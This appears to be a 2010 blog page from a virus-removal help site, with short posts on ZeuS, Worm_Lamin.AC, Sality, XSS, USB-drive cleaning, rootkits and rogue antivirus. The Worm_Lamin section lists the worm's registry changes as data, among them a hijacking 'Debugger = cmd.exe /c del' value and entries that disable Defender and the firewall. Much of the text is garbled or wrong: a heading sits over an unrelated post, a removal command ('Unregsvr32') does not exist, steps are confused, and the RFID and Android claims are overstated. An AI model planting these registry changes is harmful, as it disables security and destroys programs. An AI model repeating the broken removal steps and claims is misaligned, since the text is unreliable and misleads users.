Expert Virus Removal Services and Technical advice.

We are Providing Computer users with Expert Virus Removal Services and Technical Advice.

Threats and their Removal.

Do you need a quick solution to a technical problem? With our live remote-assistance tool, a member of our support team can view your desktop and share control of your mouse and keyboard to get you on your way to a solution.

Spywares and their Removal.

Are you worried that your computer might be nfected with Spywares? Then this is were you can find Support.

Advices for Protecting the Computer.

Expert Advices for Protecting your computer from attacks from all threats

Different Anti Virus Software and Tools.

Familiarizing different Anti Virus Software and removal Tools.

December 31, 2010

Man in the Middle and Redirection Attacks

We use to play a game where two people throw the ball to each other while the third person in the middle will have to intercept the ball then he changes the position with the person from whom he has intercepted the ball.

In the cyberworld, the game of keep-away gets a new twist; the two players have no idea the man in the middle (MITM) exists. It works like this:
  • Computer A initiates conversation with Computer B
  • Computer C intercepts that attempt and then relays the request to Computer B
  • Computer B responds, Computer C intercepts it, and returns that response to Computer A. 
While the computer C has intercepted the communication between A and B it may change the data in the communication or even redirect it to an entirely different new destination while computer A still thinks that it is receiving the information from computer B.


Key Loggers

In general keystroke loggers is the action of tracking the keys that are typed on a keyboard without letting the user know that their actions are being monitored. In its simplest form, a keylogger trojan is malicious, surreptitious software that monitors your keystrokes, logging them to a file and sending them off to remote attackers. They can be classified as Software key loggers and Hardware key loggers.  

December 30, 2010

Unconquered Zeus Threat

ZeuS is a well-known banking Trojan horse program, also known as crimeware.  This trojan steals data from infected computers via web browsers and protected storage. Once infected, the computer sends the stolen data to a bot command and control (C&C) server, where the data is stored.

The US FBI, Secret Service, and various NY agencies have issued a joint Cyber-Security Advisory warning of the threat posed by the Zeus botnet specifically and wire fraud risks from keylogger trojans in general. Zeus combines keylogger capabilities with man-in-the-middle (or man-in-the-brower) style attacks to steal online banking credentials.

How to remove Worm_Lamin.AC

First I suggest you to follow prevention is better than cure proverb as it is better to safe than trying clean up after the system getting infected. We have to be very careful in clicking the unknown links, enable pop-up blocker, Turn on firewall on your system, getting the Anti-virus updated are some of the basic things we need to make sure that they are done to safe guard our system.

Manual removal of the worm : 

Step 1: We need to turn the system restore off.
Step 2: Delete all the files and processes that belong to the worm from task manager processes tab
Step 3: Some times you will not be able to download the files from the locations found from the processes tab or using process explorer, at that time restart the system in safe mode and and try to remove the files.
Step 4: Enable Registry Editor
Step 5: Delete the registry values from the path 


  • In HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
    • Shell = %Program Files%\Microsoft Office\OFFICE11\WINWORD.EXE
  • In HKEY_CLASSES_ROOT\exefile
    • NeverShowExt =
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
    • EnableLUA = 0
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\{Application name}
    • Debugger = cmd.exe /c del    
      
  • Delete the registry keys 
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\
      • Svc
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\
      • FWCFG
    • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
      • WinDefend
    • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center              
     
  • Restore this modified registry values in the files 
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced From: SuperHidden = 0
    To: SuperHidden = 1
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc 
  • From: Type = 4
    To: Type = 20 
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess
  • From: Type = 4To: Type = 20 
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv
  • From: Type = 4To: Type = 20 
  • There will be another location with the same path change the value from type 4 to 20.

Search and delete the keys in the following location for different files %Program Files%\Microsoft Office\OFFICE11\ control.ini 
Drvics32.dll
hjwgsd.dll
jwiegh.dll
PUB60SP.mrc
ruimsbbe.dll
smss.exe
yofc.dll
remote.ini


After doing this please scan your computer using any good updated anti-virus program.

Worm_Lamin.AC

This worm will propagate via instant messaging applications online like yahoo messenger, Gtalk, msn Messenger or Digsby.


Effects: 

  • Deletes registry  that are related to anti-virus and security applications resulting in improper functioning of anti-virus programs leaving the system security at risk
  • It disables security center functions like firewall security updates
  • Disables Internet connection sharing service which will disable sharing
  • It sends a copy of its link in the instant messages
It drops files following files in the system :

  • %Program Files%\Microsoft Office\OFFICE11\services.exe
  • %Program Files%\Microsoft Office\OFFICE11\WINWORD.EXE
  • %User Startup%\Adobe Gamma Loader.com

  1. These dll files are loaded into the system program files Drvics32.dl, hjwgsd.dll, jwiegh.dll, PUB60SP.mrc, remote.ini, yofc.dll, ruimsbbe.dll, smss.exe and creates an auto start entry in the registry attacking the word file. 
  2. It also disables registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot which will not allow us to boot in safe mode and explorer, shared access, services related registry entry's values will be changed to 4.  
  3. It also pings many sites that are harmful using command prompt.
  4. The sent spam messages are predetermined, which is listed in HJWGSD.DLLl, and contains the link http://bukuger{BLOCKED}.hared.com. Copies of the malware maybe downloaded from this site, which is currently inaccessible.    
So please be aware while clicking on any links in any instant messenger sites.

Mitigating Cross Site Scripting

Attackers will inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user  in order to gather data from them besides spoiling the victims PC with different things like DNS poisoning, making changes to the system security, cookie theft and adware etc

XSS holes can allow Java script insertion, which may allow for limited execution. If an attacker were to exploit a browser flaw (browser hole) it could then be possible to execute commands on the client's side. If command execution were possible it would only be possible on the client side. In simple terms XSS holes can be used to help exploit other holes that may exist in your browser.

Cross Site Scripting (XSS)

It is the vulnerability in the web applications that will inject malicious scripts in to the websites viewed by other users. This may result in hacking of the user details and misuse of it to very small issues like leading to different sites which can be easily prevented by a good Internet Security Program.

December 29, 2010

Email-Worm.Zhelatin

Anti-Virus8 is a typical rogue anti virus that installs itself on the computer and shows itself as not genuine and asks to purchase showing that there are many threats on your computer.It looks similar to AVG anti-virus and that is the reason why many people are getting to know the threat.

Brontock

This is the worm that comes as an attachment named Kangen.exe in the email. When executed this will open the documents folder and loads itself in user profiles and current user section. It consists of following the email-

Browser Modifier

This is some kind of adware which attacks the browser. It keeps on giving pop-ups and advertisements that has different obscuring infections. This will block certain other advertisements and changes the internet explorer settings for search option. This particular block will result in giving unwanted pages or browser redirects; when we want to go to particular website it will land on other site.


Virus named Java Downloader


TrojanDownloader:Java/OpenConnection.IT is the detection for an misconcepted Java applet that attempts to download and execute files from a remote web site. It often works in conjunction with Exploit:Java/CVE-2010-0094, which exploit a vulnerability in the Java Runtime Environment (JRE).






December 28, 2010

Passwords that can be Cracked Easily

Passwords are the key for securing our email or bank accounts. We must keep a good combination of small, capital letters, numbers and special symbols. They are the key sources to secure our computers, emails and bank accounts from crimeware, spyware etc.

Sality Virus

Sality is a family of file infecting viruses that spread by infecting executable files, it runs an autorun worm component that allows it to spread to any removable or discoverable drive. In addition, Sality includes a downloader trojan component that installs additional malware via the Web. So it is a combination of many infections bundled to damage the computer software.  

It will infect executable files on local, removable and remote shared drives. The virus also creates a peer-to-peer (P2P) botnet and receives URLs of additional files to download. It then attempts to disable security software on the computer. It also has key logging functionality . Sality generally drops a .cmd, .pif, and .exe to the root of discoverable drives or removable drives, along with an autorun.inf file which contains instructions to load the dropped file(s) when the drive is accessed. Updates to the malware that is dropped by it are fed via decentralized lists of HTTP URLs.


Removing Sality Virus: 

  • Take a registry back up and create a restore point to be on safe side.
  • Unregister the file using the command in command prompt Unregsvr32 vcmgcd32.dll
  • Remove the file vcmgcd32.dll by searching it using the search option.
  • Remove the "Virus.Sality.U" components:
  • BwUnin-6.1.4.36-8876480L.exe, syslib32.dll, sysdll.dll, oledsp32.dll and all the files those are associated with that file.

This will remove the virus Virus.Sality.U from the virus.

December 25, 2010

SYMPTOMS OF SALITY VIRUS

 
Sality virus is one of its kind; very dangerous and infective. It attacks all the system file components like windows task manager and registry. It is the most important part where we need to take care of as registry values are like wheels of a vehicle, if they get corrupted we may not be able to use the computer as similarly as we cannot use the vehicle if the tires go flat. 

Computer Virus Infection Strategies

A virus is a program that is written which can copy itself  and has the capability to completely destroy a computer.A true virus can spread from one computer to another if it is targeting the host computer by the infecting the files in the host computer which is on a network.



"Here you have" Virus

''Here You Have'' is one of the widely spread viruses on the internet these days. It comes as an email to inbox and states like  as the subject  "Subject: Here you have or Just for you". It is also called

W32/VBMania@MM  


December 24, 2010

REMOVING VIRUS FROM PENDRIVES




Preventing the virus from entering the PC:
There are some common things that we need to take note of while using a pen drive/ Flash Drive/ Thumb Drive. People use Flash drives for copying data, often the date would be documents or executable files or movies and so on.
 
  • One can copy the files directly to prevent the virus that attacks folders mostly in a portable drive. That is the first important thing we need to keep in mind.
  • Secondly while opening the PD (portable drive) we should not use the autorun to open it directly. We first need to scan the PD using any good anti- virus before opening it.
  • If we find any infections we can fix them. If not fixed if they are skipped or avoided from scanning then we cannot open the PD as usual.


REMOVING IT:

Command prompt can be used for removing virus from pen drive with some familiar and basic CMD commands.

  •  Go to Command prompt by clicking on Start Run or by pressing windows logo button + R.   Type the drive letter of the pen drive with a colon following it
  •  Then type DIR/A. Check all the files and folders displayed in the list especially for AUTORUN,           RECYCLER and any .exe files which you don't expect in it.
  • Type ATTRIB *.* -S -R -H to unhide all hidden and system files.
  • Then delete the suspected files one by one using the command DEL FILENAME.EXT. This will delete the files from the drive.
  •  Repeat this process for all the folders in that drive.

This will remove the virus from the pen drive for sure.

Note: Never open the files in the pen drive when you have downloaded the files from Internet Cafe directly from windows explorer, cause they are the most important and dangerous places from where we get the infections.

REMOVING ROOTKITS MANUALLY

The term rootkit is used to describe the mechanisms and techniques whereby malware, including viruses, spyware, and trojans, attempt to hide their presence from spyware blockers, anti-virus, and system management utilities. There are several root kit classifications depending on whether the malware survives reboot and whether it executes in user mode or kernel mode.

Uninstalling an Anti-virus using removal tools:

REMOVAL TOOLS:

Any anti-virus has got some settings and files installed on different folders in computer. So today we will learn how to uninstall an anti-virus using different uninstalling utilities for different companies. Before we look into it we will need to know why we need to use the utilities to uninstall them using utilities.
Reason why we need to uninstall Anti-virus using tools is to make sure that there are no left over files in registry which cause some problems when we install another anti-virus. If there are more than one anti-virus on the system they will give raise to conflicts among themselves and none of them work.
So to protect our PC from infections and to have a clean one and only one security application we need to use the removal tools to uninstall them.

Names of few tools to uninstall different security programs:

  • Norton removal tool
  • McAfee consumer product removal tool
  • Avast uninstall utility
  • Removal tool for Kaspersky products
  • Avg remover
  • Bit defender uninstall tool

These removal tools will help us in removing the anti-virus that we have installed completely from the computer that will help in installing any other anti-virus programs without any problem.


These are operating system independent. That means they work in XP, vista as well as in win7. Sometimes we need to remove the toolbars that we get along with these full programs. For eg. Panda Anti-Virus Firewall 2010 uninstall tool. Norton Online family, Norton online back and so on these have to be uninstalled separately from either add or remove programs or using concerned removal tools.

Virus in RFID

VIRUS THAT HAS INFECTED MAN:

There has been a recent attack on a RFID chip implanted into Dr Mark Gasson’s left wrist by a virus. He gave an interview to BBC world news about the same and its effects.
There are many things we can do with a RFID chip. We can communicate with our mobile phone, we can gain access to our organization we work for and so on. If the chip we use to get access to the machines gets infected there are chances that the machines we show the RFID chip will get infected as well like mainstream computers.

An RFID chip means Radio Frequency Identity which will be embedded into human body to access like it is being done to animals. It is going to be a revolution in future; everyone will be having a RFID chip with all their personal details fed in to it. It may replace SSID to have advanced tracking system.

The virus that has infected the chip that Dr Mark Gasson has implanted into his hand is infecting all the machines that he is accessing using that. BBC news asked how well they infect the devices or computers that he accesses. Medical implants are prone to viruses as the implanting technology has developed to a point where they are capable of communicating, storing, and manipulating data. So technology has to keep pace with the new viruses that are being invented daily and should secure themselves from viruses.

December 23, 2010

Bom Samado Worm

Are you having GOOD SATURDAY WORM:

Is your orkut safe? Did your friends complain about scraps that are being sent to them with a name Bom Sabado, which means GOOD SATURDAY in Portuguese, that they are receiving regularly from your account? If you are experiencing this issue this means your Orkut account is being infected with this severe virus/worm. It has attacked the cross site scripting of the orkut site and has spread its presence.

ANDROID FAKE PLAYER-VIRUS

Android Fake Player:

A new virus was found with the phones using Android operating system, that is called Trojan SMS . This virus works by sending a premium SMS, which is very dangerous, once received corrupts the entire phone. Application of this virus is about 13 KB and will be active when the user is running the media player application. When running this file users will be approved or not activated when the Trojans has just started to attack.

December 17, 2010

Installing Anti-Virus

Different Anti-Virus companies Compatible with Win7
An anti-virus will have a set-up file that will install the program. Before we install it we will have to check many things that need to be unchecked, disabled or enabled. Even uninstalling have to be done using some tools else it will not be removed completely and it will be there in registry which creates some problems in future.

Things to look for in selecting an Anti-virus Program

Features of a Good Anti-Virus:

Things we need to look for,when we purchase an anti-virus are: 
  • Good scanning engine
  • Behavioral Scanning feature 
  • Resource friendly
  • Install and uninstall without any problems
  • No conflicts with other software
  • Boot level Scanning
  • Last but not least, User friendly and Operating system flexible
We need to look for its scanning engine; how deep it scans the computer, whether it scans the system files, compressed files etc.. Also different scanning options, like Quick scan, Full Scan, Custom scan.
Now a days we are getting scanning options like root-kit scanning malware scanning built in to the original scanning module. This avoids purchasing an additional protection software for that infections.

This is another point we need to look for. Internet security is one other thing that has led to the concept of Firewall. Firewall is a tool that monitors that network traffic. We can have some ports blocked or allowed using a firewall. It helps us protect our computer from hackers

Browser and Email protection:  Companies have doubled their ideas and came up with concept of Email Client and browser protection. Browser protection comes with different names like site advisor, safe search, Identity protection etc.. Email protection helps us in preventing unwanted junk files to be filtered and deleted including spam.
However, it is our duty not to open any mails that are from unknown senders and that has links that lead to infiltration of different infections. Spammers always try to send spam mails that will always attract our attention.

Internet Security comes with parental control as well. It is a good tool to monitor kids and help them use the Internet safely. 

End of the day, though we use any good anti virus it is our responsibility to be careful in opening sites that are risky and protecting our programs, network and files with a password. Last but not least look for compatibility with your operating system. For instance if we purchase a security program that is compatible with XP computer it is not compatible with vista. So please take some time in looking for these things in an anti-virus program and go for it.

December 15, 2010

Removing Fake Spywares Manually

Fake anti-viruses are the most important and dangerous infections from which we need to be cautious about. They keep pestering us with pop-ups showing many risks and show us to purchase a full version of it when we click on clean infections. This includes spy wares that take access of most of the system processes and disable most of the trouble shooting tool in windows. Since they take spy on computers after getting installed they are called Spy wares. These fake anti-viruses are created by hackers trying to steal your money using the tactics: fake alerts, wrong scan results and Interfaces that look similar to popular anti-virus software. They will make PC run slow. This can infect operating systems XP, Vista and win-7 

 

Fake Anti-Viruses

Anti virus is a basic security tool that protects us from any kind of  viruses. There are more than 145 different anti- virus companies in the market that helps us protect our conputers.


Taking an advantage of these, many people are trying to create fake versions of those that are there in the market which is actually a risk that no one can find so easily and even the anti-virus companies are facing a uphill task to update their definitions for the newly created fake anti-viruses.

Related Posts Plugin for WordPress, Blogger...

Search This Blog

Followers

Categories

Twitter Delicious Facebook Digg Stumbleupon Favorites More